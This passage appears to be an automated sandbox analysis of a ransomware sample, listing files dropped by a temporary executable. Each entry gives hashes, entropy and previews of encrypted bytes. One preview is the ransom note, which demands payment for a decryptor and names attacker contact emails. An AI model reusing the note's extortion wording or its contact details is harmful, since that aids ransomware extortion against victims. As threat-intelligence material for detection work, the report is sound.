                                                                                                                                              Preview:..H.=ue..4.O...z..2....... `.4..H~M.Ba.L..{.7.j.C.....Z..[...o..{......=.j.r.6...^Zc+s.k.Y`ic..IZW..i..&..;.........7?..d.5......P./.. .l9..Y...g.5L.>.e.93^.J.jj...M.....u...lR}N|p....+l.#..l...N.=8K.q5K*.rL...$..M.l...}|..a<(...@.0...F:5,!...|.1".........B.*.l...0....Z.I.*.7...h]^TV.o.5..F...Y..A. ......~.]...[....2s....4!..)q-.i...........6..S1..&..l1.@..*.....BRSvU../.@]ea.vc.......,....wU.Hl...%[.;....T.z....^.(....B_7*..y..C{4t...^..*........1+-@-.C..5.......g..K.(.p..3.Lk....G'.#.......L.U.wl_i........>i.6.wM+...V.|..D..*.......wN.Si..4..(..G>..zv....1.f.f].7..r$..C)i...T.H...c.R.t7....2.M.y...)..V.x.!.|x....u.o..*y~........V.....N.c......aaNH2w..k....d).....]..|.Z...h.#.#r\y.8W.....jlf.....:......G..8..m.8.C&.S..5..]...P8Ol......d.T...{[K29..y.....Z..Y..}...2ojV....Uu..O..aA.f.....u@.V...I._.Q/.[.<p..^...@.....h2.!s.^ADM.E60.O..`kP.Vy...DvO....9.nQu.T?..h.7EQ...H...Z.....Y.q...=..5...K.4.x.o..pv..1.}...?UN...%j.$..o...$L]1.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.860145692771485
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:/zkRqXqQ8KFNEUSh5bVpcl3xR5px/O9oYoLEaqpg9l6EacSH/XEm:scEP2l3xR5pFO9oaaqC3i/Xn
                                                                                                                                              MD5:BE7E31776E0F135F65E357A913A0F6F7
                                                                                                                                              SHA1:19A06C277224798D17CA0BD6D59491F2EAA9D472
                                                                                                                                              SHA-256:BECC8EB19578B15668120BCB529BEE738E92AC75DF9B51EDB432B3ABB2498107
                                                                                                                                              SHA-512:172D69BE17D5C663C29057EB2380C27B8C82E8973E2044146E313CBD8702985E4626EEC00112661236DD728BFD724EC00FEDDEE6927B1EF9D115D05C5F1704DD
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:...._hzXRm..U5...o..V.t.5.!...o.~}...L..[.JOo..n.D.saf.Y1....N.<$.Of...+.._.}O.Z..M.2..9...M..s^....}d.>....."...~s.C&.......Dj"...C.N:Hl....F.....]v.......2.......:...hm#...J....bp.b..'....R.PW}..F.i.P._.B...o..Z$ ...@...N..v{p@....n.] I....".M.M`.w....E.(....+.C.N...x.c..O..gF.N^.A..4...4Gq..RHo.;.Z..yV.h-"..89M.^*.-.u.~.j3...1.).....=.....S_'......b../...>.?L...O.h. ...v M!C.......e!)~w..'.........5.e.g.Ts\.okxE3..(..a...<0l7.k.'..........@...z.{..-...+."0....g....R....yZ._{...AJ....@\9....u._.s|.tYV..iuHS...,.....$.N..Ge.....E..(...D@....*....h...J....Rn.....FU-....$x..]21z.'g4....aY...].Bl,|..?.Es.......Q;0.`.N....x.{(L.&.}3..}............".."....g.O.I.s..9..r.%....o.z....^.8~-<a.W.....3....q].D1..d..S.lJ..t2G../.T..8KU.TG.....A....#.9...^....T...8.>....o+5.../....w.m........iF.a8V...).@...A.OI..q....|.....p.u..~...Y.Z...'.....~f..Z.......T..z.....V...../m. .j>...w_v..{@,r6.6........dW.."[v..&D!..$.2V..h.t)..Ag.)._.&..f...(.G.(I.Ao.M..G
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.860145692771485
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:/zkRqXqQ8KFNEUSh5bVpcl3xR5px/O9oYoLEaqpg9l6EacSH/XEm:scEP2l3xR5pFO9oaaqC3i/Xn
                                                                                                                                              MD5:BE7E31776E0F135F65E357A913A0F6F7
                                                                                                                                              SHA1:19A06C277224798D17CA0BD6D59491F2EAA9D472
                                                                                                                                              SHA-256:BECC8EB19578B15668120BCB529BEE738E92AC75DF9B51EDB432B3ABB2498107
                                                                                                                                              SHA-512:172D69BE17D5C663C29057EB2380C27B8C82E8973E2044146E313CBD8702985E4626EEC00112661236DD728BFD724EC00FEDDEE6927B1EF9D115D05C5F1704DD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...._hzXRm..U5...o..V.t.5.!...o.~}...L..[.JOo..n.D.saf.Y1....N.<$.Of...+.._.}O.Z..M.2..9...M..s^....}d.>....."...~s.C&.......Dj"...C.N:Hl....F.....]v.......2.......:...hm#...J....bp.b..'....R.PW}..F.i.P._.B...o..Z$ ...@...N..v{p@....n.] I....".M.M`.w....E.(....+.C.N...x.c..O..gF.N^.A..4...4Gq..RHo.;.Z..yV.h-"..89M.^*.-.u.~.j3...1.).....=.....S_'......b../...>.?L...O.h. ...v M!C.......e!)~w..'.........5.e.g.Ts\.okxE3..(..a...<0l7.k.'..........@...z.{..-...+."0....g....R....yZ._{...AJ....@\9....u._.s|.tYV..iuHS...,.....$.N..Ge.....E..(...D@....*....h...J....Rn.....FU-....$x..]21z.'g4....aY...].Bl,|..?.Es.......Q;0.`.N....x.{(L.&.}3..}............".."....g.O.I.s..9..r.%....o.z....^.8~-<a.W.....3....q].D1..d..S.lJ..t2G../.T..8KU.TG.....A....#.9...^....T...8.>....o+5.../....w.m........iF.a8V...).@...A.OI..q....|.....p.u..~...Y.Z...'.....~f..Z.......T..z.....V...../m. .j>...w_v..{@,r6.6........dW.."[v..&D!..$.2V..h.t)..Ag.)._.&..f...(.G.(I.Ao.M..G
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840141980009211
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:tJBUI/pz4/olcoJiFBxJ5710XVQToR2KV4xqhk7If87ZWHJBjUpCOkVIAFcSwO:dlR8/1oJiFBr/tS+ak7IfgWHJo4b
                                                                                                                                              MD5:CC5C081A54A3BB67F8C4B2B6232B4162
                                                                                                                                              SHA1:9FAF17C6070A0EA36AE611F1A9C513A6DACEF2FD
                                                                                                                                              SHA-256:818449CF3D35CFF6410A58D78953AADB96118F7D625E115A4086EC332A0B095D
                                                                                                                                              SHA-512:C685281DD8A83F50525D8A1F39663ACAC32C71BEC5F38F4C5693923B9F5DDB34660E15E6B341CE2D7856999FE1FFFCCC8E635AD6505DA4BE5C7FFA161A14383C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:=..o[3}&..q....-*9...TWyR{..\E.&M.X.j.5..ZLi..........6r......'....\wV....z....)..0.>u.....=H.@.....2...HsuV.}G.].Q..=q..u.i.....[....*....R.~...?.iq.A..a2...~j..'N.xa.2...y.Z...6jN4'\...p.-.O.......`.*..*E. ....yK.3..B.J.T..R...k....+.5L....0.fe.[3.....Z.G.m ..../...E.p.D....>..3..._....4G....$..|.]..xND^...wa.?.A............SS.7.}....[.CF."...UgX.....O..m......Xw.J. .S(.T/,..O.';..,.a.h.T.Fs`.u (...,.......R.x..,...;....?...z".....~......S.'.......i..{.....P"k...1..6Ze....b.G._j..,..=v*...Ai..D.#.....+.p..w.+....L.N.l..b..b4.z...^.}.*.".4l...C...JVG.9...>..i.=.$.I...K..4..@...g....i'.q.T.u....k.....p....m.G_.....[.........0........!...#...R..'.={..4.@i.@.E.'...$D.Y....&V...PF.d.a3.>K.A...o.,........!.@.>..:.3i......B.cJ.7..G.w..8A/.k..'.@..V.......A.,m+...".N.].....r.....E.G...9J.$.DhvE.Yod..@E.i?%...y...9. ..I.nK.x.zj.._b......._.fa{.....R...N..s-u..PB..Pz.a.-?...C..&...R.nb..`eQ...d8....Oc.."...v... .....?..,.O...1."f...k ..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840141980009211
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:tJBUI/pz4/olcoJiFBxJ5710XVQToR2KV4xqhk7If87ZWHJBjUpCOkVIAFcSwO:dlR8/1oJiFBr/tS+ak7IfgWHJo4b
                                                                                                                                              MD5:CC5C081A54A3BB67F8C4B2B6232B4162
                                                                                                                                              SHA1:9FAF17C6070A0EA36AE611F1A9C513A6DACEF2FD
                                                                                                                                              SHA-256:818449CF3D35CFF6410A58D78953AADB96118F7D625E115A4086EC332A0B095D
                                                                                                                                              SHA-512:C685281DD8A83F50525D8A1F39663ACAC32C71BEC5F38F4C5693923B9F5DDB34660E15E6B341CE2D7856999FE1FFFCCC8E635AD6505DA4BE5C7FFA161A14383C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:=..o[3}&..q....-*9...TWyR{..\E.&M.X.j.5..ZLi..........6r......'....\wV....z....)..0.>u.....=H.@.....2...HsuV.}G.].Q..=q..u.i.....[....*....R.~...?.iq.A..a2...~j..'N.xa.2...y.Z...6jN4'\...p.-.O.......`.*..*E. ....yK.3..B.J.T..R...k....+.5L....0.fe.[3.....Z.G.m ..../...E.p.D....>..3..._....4G....$..|.]..xND^...wa.?.A............SS.7.}....[.CF."...UgX.....O..m......Xw.J. .S(.T/,..O.';..,.a.h.T.Fs`.u (...,.......R.x..,...;....?...z".....~......S.'.......i..{.....P"k...1..6Ze....b.G._j..,..=v*...Ai..D.#.....+.p..w.+....L.N.l..b..b4.z...^.}.*.".4l...C...JVG.9...>..i.=.$.I...K..4..@...g....i'.q.T.u....k.....p....m.G_.....[.........0........!...#...R..'.={..4.@i.@.E.'...$D.Y....&V...PF.d.a3.>K.A...o.,........!.@.>..:.3i......B.cJ.7..G.w..8A/.k..'.@..V.......A.,m+...".N.].....r.....E.G...9J.$.DhvE.Yod..@E.i?%...y...9. ..I.nK.x.zj.._b......._.fa{.....R...N..s-u..PB..Pz.a.-?...C..&...R.nb..`eQ...d8....Oc.."...v... .....?..,.O...1."f...k ..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.874586726872771
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:iz+514BdLCV/yyALdZBUMKBZFy3D+kysc4/00IEEx6v/Q1H8togSjdwwJXFtEGNB:7z4BVg/Ed/UNyD+kysc4/0T3l8Ojn14O
                                                                                                                                              MD5:0F277F11369A78FBBF92460B6E1877F6
                                                                                                                                              SHA1:0F856D3CE4B2D247C265AC8619F95DC5774A3C59
                                                                                                                                              SHA-256:7D8D2EFC420705138ECF93D03F0F1F36E31DD463A9896744D5049B091C0AD1C4
                                                                                                                                              SHA-512:09D69E1DB65BA7B12AE1AC31C18095BE1FB80DFADC2A7704E4055CB87A8F67EEC7AD19CAB5DA166E6E6B497D626782CC55CD143B6FCE39B221514BB0F92C8A56
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:8....#,<.BO.U6.....8.....fxv..>$S.QG89S...X..g..Bv.w.>6...t<).tm.h0.....B.f`..-.|\.9K.....J..w.O%...W....:....s`..,.}.w....Ln...:.R..2.?8..W .EctRPCH..6.D..Aa.....h.U.-.qI..,..Z..\.....T.....$..;-.>.2{.x..)..3...i....U..b\..zz...Ai>.>!....=,.m5.!..?Tq...m...G.4.Y...b.s;.IE4...!l>..6S...A`.&..&.....@....s..Os. ;.p...'....c~.q.v\{.i.._....9..".yA./f%.......`8....Nop..?>.$.|P...."..n....r..qh.+.0bI...../.!D.....}.5.H..u...z...H..%.e.5........p..'.0#..\.P...N\.z.Q...!.c.t........tM.r.R.7:.C...+.mk]-......k.(G.....}....yMU.g..-......h......>....X.6vc.%.1.r.^.?e....`..M.#."....p.a..g..o}^.....B^.......xG.x..s.......{..M...F..%.[|.]Kpqq.W.&....W.f..\...M.......a.@.."...#o.Br..:E.a.B....LTN. .+.]Dx-....+Fx..\..{.o....d.1P..._3x.p..4..:..&.g@21....*......U.\Lz.J...9.......N.m._.....jd.........~....(2..<.z...:/....>.h.9.FX......B.k.=Au#I..S.....,J.........#.....G.|..Nw.5G....1W....JZ.X....GS.)z....P@/....w..H....d.....C.....m.....R._..X?......"V..(H...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.874586726872771
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:iz+514BdLCV/yyALdZBUMKBZFy3D+kysc4/00IEEx6v/Q1H8togSjdwwJXFtEGNB:7z4BVg/Ed/UNyD+kysc4/0T3l8Ojn14O
                                                                                                                                              MD5:0F277F11369A78FBBF92460B6E1877F6
                                                                                                                                              SHA1:0F856D3CE4B2D247C265AC8619F95DC5774A3C59
                                                                                                                                              SHA-256:7D8D2EFC420705138ECF93D03F0F1F36E31DD463A9896744D5049B091C0AD1C4
                                                                                                                                              SHA-512:09D69E1DB65BA7B12AE1AC31C18095BE1FB80DFADC2A7704E4055CB87A8F67EEC7AD19CAB5DA166E6E6B497D626782CC55CD143B6FCE39B221514BB0F92C8A56
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:8....#,<.BO.U6.....8.....fxv..>$S.QG89S...X..g..Bv.w.>6...t<).tm.h0.....B.f`..-.|\.9K.....J..w.O%...W....:....s`..,.}.w....Ln...:.R..2.?8..W .EctRPCH..6.D..Aa.....h.U.-.qI..,..Z..\.....T.....$..;-.>.2{.x..)..3...i....U..b\..zz...Ai>.>!....=,.m5.!..?Tq...m...G.4.Y...b.s;.IE4...!l>..6S...A`.&..&.....@....s..Os. ;.p...'....c~.q.v\{.i.._....9..".yA./f%.......`8....Nop..?>.$.|P...."..n....r..qh.+.0bI...../.!D.....}.5.H..u...z...H..%.e.5........p..'.0#..\.P...N\.z.Q...!.c.t........tM.r.R.7:.C...+.mk]-......k.(G.....}....yMU.g..-......h......>....X.6vc.%.1.r.^.?e....`..M.#."....p.a..g..o}^.....B^.......xG.x..s.......{..M...F..%.[|.]Kpqq.W.&....W.f..\...M.......a.@.."...#o.Br..:E.a.B....LTN. .+.]Dx-....+Fx..\..{.o....d.1P..._3x.p..4..:..&.g@21....*......U.\Lz.J...9.......N.m._.....jd.........~....(2..<.z...:/....>.h.9.FX......B.k.=Au#I..S.....,J.........#.....G.|..Nw.5G....1W....JZ.X....GS.)z....P@/....w..H....d.....C.....m.....R._..X?......"V..(H...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8429506499101045
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:vzWpcIydeQzEeShiLYI2FNnMtTKmt9yMqaAxzReF31qOOF9eWIe22:vzJAQzEJhiLycTKmtgMqfxzYF3YOk9ec
                                                                                                                                              MD5:BE5E502D6823D317D427C936F230B694
                                                                                                                                              SHA1:3BBF4FB6872AC0408B5FF26369BF1ECBC48B23FF
                                                                                                                                              SHA-256:E63EE72E979881739990677DCAE969B2715971A185DC490CC0EBE4E8C55D7120
                                                                                                                                              SHA-512:6470051AC9390B37DA61BCE9D692334FB499FD4F4DBAE7A0AA9188E549B48178649D13327F1779831FC95C7F416C3698CF2E3C583B3578245930D5532F4EA873
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.C0.F...}...;P2nc.G....+..@.V..d.C.j%.@]..U.2d......j7M|..p.D.0..ed]...... li.~._.z*(.D.......B.]_.YH....-.|...1.i"b..L../.Xm.lS.>F/.b.........2<gs...p.H .....:...i.w...ox..]I..|M..$D..H...d..z.;..d.....)p..I..>C..{.BJ...Uuy'.4.+...~?v.c...6...s.9h..V[4'.X.q.hC.=t.M$g..'..!.r.m.-W.......C..+}..=>..k...2^.z....*.....x.5y........^d...>;=`n 5F=..H......$.\H..mr.P89Q...d[9I.<.X..o...v..8....|.a.G.."yt..?....Fr......$.......`.Gq]...V....q"?.V,.z.V..R9.K!.Q..MK....E........}9..._}.....1..x...z..L+..>....-..O.}4<T.(.Z..."...T..O....d..Z..t.1..dK.3.=$pE.....F.).8.(.^..p.%n.W/.:.._R...i.dFIs6...7..*..*......E!...^.H{..KK....+d..W....Ls...i..k/..............3..,.swq.h{...9b>,.........l....\p......'..~.....`..No........MN.....q..........r.z......L.`..3!~"J..a..L'...(..;.H......q......s.d|.5..>...fB....p..B...+.E!.d..!.K4...).Co..7.siyD....%....j...@G...s.)a .h.C...W...k[...3l..H..I.jJ...U.....v....=.d..P......l....j..X.n..l.r.~.-M..........?qON
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8429506499101045
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:vzWpcIydeQzEeShiLYI2FNnMtTKmt9yMqaAxzReF31qOOF9eWIe22:vzJAQzEJhiLycTKmtgMqfxzYF3YOk9ec
                                                                                                                                              MD5:BE5E502D6823D317D427C936F230B694
                                                                                                                                              SHA1:3BBF4FB6872AC0408B5FF26369BF1ECBC48B23FF
                                                                                                                                              SHA-256:E63EE72E979881739990677DCAE969B2715971A185DC490CC0EBE4E8C55D7120
                                                                                                                                              SHA-512:6470051AC9390B37DA61BCE9D692334FB499FD4F4DBAE7A0AA9188E549B48178649D13327F1779831FC95C7F416C3698CF2E3C583B3578245930D5532F4EA873
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.C0.F...}...;P2nc.G....+..@.V..d.C.j%.@]..U.2d......j7M|..p.D.0..ed]...... li.~._.z*(.D.......B.]_.YH....-.|...1.i"b..L../.Xm.lS.>F/.b.........2<gs...p.H .....:...i.w...ox..]I..|M..$D..H...d..z.;..d.....)p..I..>C..{.BJ...Uuy'.4.+...~?v.c...6...s.9h..V[4'.X.q.hC.=t.M$g..'..!.r.m.-W.......C..+}..=>..k...2^.z....*.....x.5y........^d...>;=`n 5F=..H......$.\H..mr.P89Q...d[9I.<.X..o...v..8....|.a.G.."yt..?....Fr......$.......`.Gq]...V....q"?.V,.z.V..R9.K!.Q..MK....E........}9..._}.....1..x...z..L+..>....-..O.}4<T.(.Z..."...T..O....d..Z..t.1..dK.3.=$pE.....F.).8.(.^..p.%n.W/.:.._R...i.dFIs6...7..*..*......E!...^.H{..KK....+d..W....Ls...i..k/..............3..,.swq.h{...9b>,.........l....\p......'..~.....`..No........MN.....q..........r.z......L.`..3!~"J..a..L'...(..;.H......q......s.d|.5..>...fB....p..B...+.E!.d..!.K4...).Co..7.siyD....%....j...@G...s.)a .h.C...W...k[...3l..H..I.jJ...U.....v....=.d..P......l....j..X.n..l.r.~.-M..........?qON
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841008603088999
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:+2pBzFZRndz0uubj2Njot8Q7pPiucqQAOeGHS6YPEKU+elPU+miLDUQ5U:+0frubjg8t8uPiFAPEzPUL2y
                                                                                                                                              MD5:CFB8AF051E6E06980B1312F6013F1B89
                                                                                                                                              SHA1:7DE8FF87AC947C66CAAD0740D4B7D229C8E4D525
                                                                                                                                              SHA-256:486E869F60CB4C5123C630B230A2600C6E633F2F005DD120AC091553DBF6079D
                                                                                                                                              SHA-512:5E11CC98A2B8F1FB5C5633D825A6F3DCCBAEB9292F697C7E2EFF128180793F8E29CCAE1AE243BFF8110B5E201FAE0A614A8230449615175038E4C8C5F6AC59D4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:N|x7....0q...1s.oKp...&.....6...yh...mT........e..D.C......S#.!.$x....8......Y.!..V..z.."..h......}......8.A..`....BB..I..).8.....3.<#.B....6..)......P ..\|~...t..NG....@8.,5....d.....bp.9.av..KQ....Z...>...n..~.:....'..b'.=xN.JU......:.^....+..w...>.:.Yr..o..@..s.G<.[.)...#...N2..^.J..Hc.3&.:..b....n....z.b.=...#..yq.j.4f.e.:3.FL.....z.o.1.....3L..c..L....0=.ty>...........2...."....>.2.D...xD.Vo..U?......2:...+V.zh....M.,..A.e.....(...C,.W...{0.V.7..1........a.t*....y...62...;uR.'5c....{.t.~1.@...0'...h.-....}.|gpx...<w...s.C.M{ (...J..mu...Le;[cqT.B}.@j9.:.9....7r.....&.........%.)...~C.P.,u...4.._.U.G.^F.Cp:o.e..w...=....a.....>1Vag....g..UFiT..P.-......@C..$nz/.Jb..].!......0[.M..].#.j.)Q...../...V1.?U..F.....1..7.^..p..z.2_@.Q_\.=UK)........'N" Z ...d.K.(i[.5L...E.8......?...DK.K....l...cy..V.t...C....C....#.....N>Z....'....vr..9X.)..W...k.LScLA.9l"..*Mr).y.;. '.....>..5...Xs....]._F@E.'.....,.>38..L..K.%..........&.......?...qm.?5.[T.5
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.841008603088999
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:+2pBzFZRndz0uubj2Njot8Q7pPiucqQAOeGHS6YPEKU+elPU+miLDUQ5U:+0frubjg8t8uPiFAPEzPUL2y
                                                                                                                                              MD5:CFB8AF051E6E06980B1312F6013F1B89
                                                                                                                                              SHA1:7DE8FF87AC947C66CAAD0740D4B7D229C8E4D525
                                                                                                                                              SHA-256:486E869F60CB4C5123C630B230A2600C6E633F2F005DD120AC091553DBF6079D
                                                                                                                                              SHA-512:5E11CC98A2B8F1FB5C5633D825A6F3DCCBAEB9292F697C7E2EFF128180793F8E29CCAE1AE243BFF8110B5E201FAE0A614A8230449615175038E4C8C5F6AC59D4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:N|x7....0q...1s.oKp...&.....6...yh...mT........e..D.C......S#.!.$x....8......Y.!..V..z.."..h......}......8.A..`....BB..I..).8.....3.<#.B....6..)......P ..\|~...t..NG....@8.,5....d.....bp.9.av..KQ....Z...>...n..~.:....'..b'.=xN.JU......:.^....+..w...>.:.Yr..o..@..s.G<.[.)...#...N2..^.J..Hc.3&.:..b....n....z.b.=...#..yq.j.4f.e.:3.FL.....z.o.1.....3L..c..L....0=.ty>...........2...."....>.2.D...xD.Vo..U?......2:...+V.zh....M.,..A.e.....(...C,.W...{0.V.7..1........a.t*....y...62...;uR.'5c....{.t.~1.@...0'...h.-....}.|gpx...<w...s.C.M{ (...J..mu...Le;[cqT.B}.@j9.:.9....7r.....&.........%.)...~C.P.,u...4.._.U.G.^F.Cp:o.e..w...=....a.....>1Vag....g..UFiT..P.-......@C..$nz/.Jb..].!......0[.M..].#.j.)Q...../...V1.?U..F.....1..7.^..p..z.2_@.Q_\.=UK)........'N" Z ...d.K.(i[.5L...E.8......?...DK.K....l...cy..V.t...C....C....#.....N>Z....'....vr..9X.)..W...k.LScLA.9l"..*Mr).y.;. '.....>..5...Xs....]._F@E.'.....,.>38..L..K.%..........&.......?...qm.?5.[T.5
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.866869452027065
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ASKVKYQzhSBUAhF7Rqvkbha4ZhxcWmclBXSbwD5C9pHkEMaZnuOw:/KMbt+VhRDbjxaopSbEWFVu
                                                                                                                                              MD5:596DB69319D6B14FF1624DA6EA9B1EDD
                                                                                                                                              SHA1:D1AB1D8B559C662A519854711C78DEB71FE655E1
                                                                                                                                              SHA-256:4753BA345E77248057A174916543AA3B5E858A6DA28C3942F895668BB2C69448
                                                                                                                                              SHA-512:4805D94B329CE4EC853A36D88BA626AE309357C10A32824B52182F18C99DCC66F3703EB8929ED702FFE4D207BF1DB3622AB3403B8AFD380B90047D9F73C5FEE3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...)$.b.H.rJ."..8...:Z.<|W.D...Il......}.7:.lpl.rlH...........?.x.e.z....^M.>.~..\..q..YR}.8.9.)G.~c.T;3.D..%w.$AE..s.?.a...@.8..T|..Sco...MB.-....4.,T.C.jFd.A....'.c........s...9l.GL....z-....F.....{.v.b.i...Q..Q....5.$_.....w..E. .B..6.7....;.,...R..F.....O).....!.bV..b.]dG.F..v.~.e.y;.....)#..%F...""..n.l..c._..#I1h2..Q.m.,7ST...^N...v...c,:..P.\....iXH6.....[.^..r.(5.ifn(1..u.....W....%.z.vH..}..-.....J.....Z....m...'..\.n....h]A.k.2\.S.....Y..S..........yO.h.'u.NG..|....4Z.@.`e.....~<Lu/.....hmts..~i4.:...a>.<.......}...."....."@."t.A..g..T....#y'...s,t..cA. C...rI=....~s..).....T.h.`G.....W#.t..rz........?...(.7.br.y......A&.~.~]......M.....J...=j.....k.^....F36..Y.z...;.....2TwNo.Y,.&A.....@[..li]u.K..J.g,Iw...}..:.0...a..F8..>..s.....T..q3.'.1;.C.4...~.,.2.nt.E.......}...&..../........WYJ?...Mh/.].......+..LQ..4.D>P......[;*x.!Z!.M.8{"..i.3I7.+....U.......r.K..]..VR...H........%.j.7..=!..& .r.....5...jZG..2}'....Ch.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.866869452027065
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ASKVKYQzhSBUAhF7Rqvkbha4ZhxcWmclBXSbwD5C9pHkEMaZnuOw:/KMbt+VhRDbjxaopSbEWFVu
                                                                                                                                              MD5:596DB69319D6B14FF1624DA6EA9B1EDD
                                                                                                                                              SHA1:D1AB1D8B559C662A519854711C78DEB71FE655E1
                                                                                                                                              SHA-256:4753BA345E77248057A174916543AA3B5E858A6DA28C3942F895668BB2C69448
                                                                                                                                              SHA-512:4805D94B329CE4EC853A36D88BA626AE309357C10A32824B52182F18C99DCC66F3703EB8929ED702FFE4D207BF1DB3622AB3403B8AFD380B90047D9F73C5FEE3
                                                                                                                                              Malicious:false
